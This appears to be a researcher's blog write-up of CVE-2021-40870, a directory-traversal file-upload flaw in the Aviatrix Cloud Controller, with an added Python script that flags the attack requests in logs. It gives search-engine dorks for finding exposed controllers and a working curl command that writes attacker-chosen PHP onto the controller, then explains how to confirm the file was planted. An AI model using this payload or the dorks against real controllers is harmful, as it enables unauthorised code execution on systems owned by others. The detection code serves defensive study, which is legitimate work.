Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code [CVE-2021-40870]

Similar APIs designed to upload files from authenticated users did not properly sanitize their destination input, allowing directory traversal attacks which could eventually allow an authenticated attacker to execute code on the controller.

So the directory traversal actually allows an unauthenticated attacker to execute code, or at least store code, on the controller.

Before exploiting this vulnerability we need to find it. We can do that using Google or Shodan; let's start with Google.

intitle:"Aviatrix Cloud Controller"

Shodan returns more results than Google, and other search engines like Shodan will be helpful too. Finding this vulnerability and exploiting it in the wild is not a good idea: if those targets do not permit testing by outsiders, it is not legal. [Educational purpose only]


We can exploit this vulnerability using curl or python3. Let's start with curl:

curl -k https://domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'

It will return success, but that alone doesn't mean you have successfully exploited the vulnerability; check whether the file was really saved by requesting this path: https://domain.tld/v1/test.

We used test at the end of that URL because in the account_name parameter we gave the PHP file the name test.php. You can change that name; after changing it, the file name in the exploit path changes as well. In the data parameter we gave our PHP code, which is what gets saved into the file. Exploiting this vulnerability is quite easy for an attacker and quite harmful, because an attacker can store PHP code on your controller.
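From the defender's side, the request shape above is easy to recognize: a POST to /v1/backend1 whose form body carries a `..` path segment in a parameter and a PHP open tag in `data`. The following Python is an added example, not part of the original post, that inspects request records (method, path, form body) and flags both signals. The request records are constructed here to exercise the check; they include the write-up's own payload, a double-percent-encoded traversal, and a benign request. Field names like `method`/`path`/`body` are assumptions about whatever request log or WAF export you feed it.

```python
import re
from urllib.parse import parse_qs, unquote

# A '..' segment bounded by separators (or string start/end), after decoding.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# PHP open tags: '<?php' and the short echo tag '<?='.
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding so %252e%252e%2f is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(method: str, path: str, body: str) -> list:
    """Return a list of findings for one request; empty list means nothing suspicious."""
    findings = []
    if method.upper() != "POST" or not path.startswith("/v1/backend1"):
        return findings
    # parse_qs applies one layer of URL decoding; fully_decode handles extra layers.
    params = parse_qs(body, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = fully_decode(raw)
            if TRAVERSAL_RE.search(value):
                findings.append(f"traversal in {name}")
            if PHP_TAG_RE.search(value):
                findings.append(f"php tag in {name}")
    return findings


def scan(records: list) -> list:
    """Run inspect_request over records and return (record_id, findings) for hits only."""
    hits = []
    for rec in records:
        findings = inspect_request(rec["method"], rec["path"], rec["body"])
        if findings:
            hits.append((rec["id"], findings))
    return hits


# Constructed sample records: the write-up's payload, a double-encoded variant, and a benign call.
SAMPLE_RECORDS = [
    {"id": 1, "method": "POST", "path": "/v1/backend1",
     "body": "CID=x&action=set_metric_gw_selections"
             "&account_name=/../../../var/www/php/test.php&data=hello<?php phpinfo()?>"},
    {"id": 2, "method": "POST", "path": "/v1/backend1",
     "body": "CID=x&action=set_metric_gw_selections&account_name=%252e%252e%2fx&data=plain"},
    {"id": 3, "method": "POST", "path": "/v1/backend1",
     "body": "CID=abc123&action=list_accounts&account_name=prod-account"},
]

if __name__ == "__main__":
    for record_id, findings in scan(SAMPLE_RECORDS):
        print(f"record {record_id}: {', '.join(findings)}")
```

Matching on `..` segments and PHP tags in the body catches this specific request, but the durable control is the server-side fix (confining the destination path); treat the detection as a way to find attempts in historical logs and as a stopgap until the controller is patched.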

You can also use the python3 exploit I wrote:

With -u give the target URL, with -c give your PHP code, and with -n give the file name.

[Do not use the information in this article for any illegal activity; if you do, I am not responsible for it.]




Security Researcher | CTF Player | Web-Application Pen-tester | Programmer

Joy Ghosh